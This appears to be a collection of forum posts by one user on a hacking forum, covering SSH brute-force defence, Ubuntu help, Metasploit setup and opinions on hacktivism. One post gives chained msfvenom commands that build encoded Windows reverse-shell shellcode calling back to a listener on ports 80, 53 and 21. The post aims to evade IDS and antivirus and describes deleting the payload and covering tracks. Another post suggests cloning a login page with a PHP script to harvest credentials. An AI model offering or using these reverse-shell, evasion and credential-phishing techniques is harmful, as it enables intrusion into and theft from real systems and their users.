bobbyb1980

This type of thing isn't as widely accepted in the Spanish speaking world (Latin America) as it is in the States/EU and people tend to be a bit less public about their works. Tons of metasploit contributions though, just not signed w/first and last names. What exactly is it you're wanting to make contact about?

You could create a script that monitors the log file and if there are x ammount of failed attempts, it will append that IP to /etc/hosts.deny. This can also be done at the firewall level.

This is very common, at least in my limited experience. They're probably automated bots. You can limit the number of attempts per mintue in IPtables. Careful though if you're working on a machine where SSH is your only access to it. You can also disable root logins and/or enable SSH keys as the login method.

If I remember correctly SET uses a python script to harvest credentials and personally I don't think the script used there is the best way to do it. I'd just clone the page myself and use one of the million PHP scripts to write the credentials to a file. Read Darren's tutorial on cloning pages.

I think a lot of those games from the stone age can be "legally" (more or less) downloaded. The ROMS are super easy to download, I'm going to guess since it's so easy to just google and download them either it's legal or the companies just don't care. For what it's worth, half those companies from the 80's and 90's are long dead anyways, like SNK, creators of the single best game to ever exist - Metal Slug.

I've caught other rogue AP's in the wild before. All I can say is, guys, don't keep your password file in a directory accessable through your web server : P Pineapple used to come default like that, not sure if it does anymore.

I think they give a bad name to hackers, conduct themselves like teenagers and are a complete waste of valuabe bandwidth. One day they'll learn change doesn't come by whining on the internet and posting people's private info. Imagine the world we'd live in if George Washington had thought that "revolution" meant handing out copies of the Queen's diary. I'm glad he knew the real meaning of the word though!

digip - Thank you for your reply. Generating C based shellcode and compiling it into a pexe or into some other exploit has a near 100% antivirus evasion success rate so writing to disk isn't really a problem. Once you get the shell u just migrate and delete the payload and run the normal "clean up your tracks" tasks and all should be good in the world. Setting up RDP and VPN's is outside the scope of my objective, router is hard as a rock also. Just need a basic shell. I've solved the problem (I think) so perhaps others would like to take a look. My problem is that I'm doing a lab with a beefy IDS setup. The goal is to have one .exe that will call out to multiple handlers on multiple ports so if one port fails, then hopefully another will work in attempts to evade the IDS/firewall. The following code SHOULD do that, still need to run some tests but based on past experience I think it will work (don't have my machine handy to test : ( ). God willing the ports aren't filtered. msfvenom -p windows/shell/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=80 exitfunc=thread > /tmp/80.raw msfvenom -p windows/shell/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=53 exitfunc=thread -c /tmp/80.raw > /tmp/53.raw msfvenom -p windows/shell/reverse_tcp -f c -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=21 exitfunc=thread -c /tmp/53.raw > 215380.c We're hackers - we create our own built in functionality : )

VLC and 10 million different plugins for it should be available via Ubuntu Software Center. Python 2.6 also comes installed by default in Ubuntu so you shouldn't need to be installing that either, something doesn't sound right. What version of Ubuntu are you using? When was the last time you updated?

Hey guys. Was wondering if anyone would be able to help me with the following: I'm trying to generate shellcode that I can compile that will call out to multiple ports. For example, I'd want a windows/meterpreter/reverse_tcp payload that connects back to listeners on port 80, 21 and 443. I know this is possible with msvenom to generate an .exe but I really just only need the first stage of the meterpreter payload(s) in shellcode. Thanks.

Has anyone downloaded the pre release and started pwning already? Anything decent to report?

Wow. Great find! Going to give it a test run tomorrow.

Have you tried installing it from Ubuntu Software Center?

My guess is that you've only captured one or two of the required 4 eapol packets. Don't think you're going to be able to crack it.

Armitage seems to give a lot of people problems. Unless you're specifically working in Windows for development purposes or something else, I think it might be a little less problematic on a linux based OS.

The computers are more or less secure, the humans are not. The groups taking down big scores aren't using IRC and ddos attacks to do it, they're socially engineering other humans. FYI - IRC played a key role in comms in the 2003 Iraq invasion for whatever that's worth and it went completely fine. I know it's good for business, but I hope you do realize that if everyone goes around preaching about how unsafe/insecure the internet is, eventually people won't use it any more.

Before I got into security I worked as a translator. Rosetta Stone has a pretty good interface for voice analysis and comparison, it gives a nice easy to read output in graph format. When we would train in accent optimization, we would have to speak into a microphone, then compare that output to that of a native speaker and work to get them as close to each other as possible to try to perfect an accent. Your base idea is very possible, have someone say "attack". have a script that iterates the input from a mic (you'd have to convert a graph to a textual representation or something that can be easily iterated, not easy but not impossible either, that's if Rosetta Stone were used but tons of other possibilities), then based on those results executes a command accordingly, like a deauth attack. From what little I know, I'd say the tough part is going to be getting that script to recognize other accents besides your own. The way that the word "hello" looks on a graph spoken by someone from California looks extremely different than that of someone from New York, and even more different than London, etc etc.

Starting to see it's not so bad, pretty awesome too : )

Have you configured it? Metasploit needs to know a l/p to be able to connect to the db.

You need to install and/or configure postgres.

That's the spirit, no need to hide if you have nothing to hide : )

If you think we don't have huge amounts of resourced invested into "hacking" then you're very wrong. I also wouldn't pay too much mind to what the media says about American infosec, it's common knowledge that they sell a non existent "cyber war" so a handful of contractors can continue to leech DoD funds. A war will not be won or lost in cyberspace and computers play a very small part in actual warfare. Frankly it's just funny what some of these security groups talk about when they use the term "cyber war".

I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form. You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment). Thanks for the tip. You mean like piping msfpayload to msfencode (same thing in essence as msfvenom ie msfpayload multi/handler PAYLOAD=... | msfencode .... -o whatever.exe?) for an .exe? If I understand you right, I tried that but was being picked up on most anti virus scanners. I also tried msfvenom with various iteration combos w/no luck. I think most of the av's are going to detect msfencoded data. Currently trying to learn shellcoding and it can be a real brain twister. Doing these labs, http://projectshellcode.com/?q=node/12 .

Haha that's awesome man! Nothing like an old fashioned brute force attack. Surprising how they claim it's secure, many routers now are requiring the user to input a captcha image to avoid these attacks.

Don't like how all the media paints the US as technologically behind.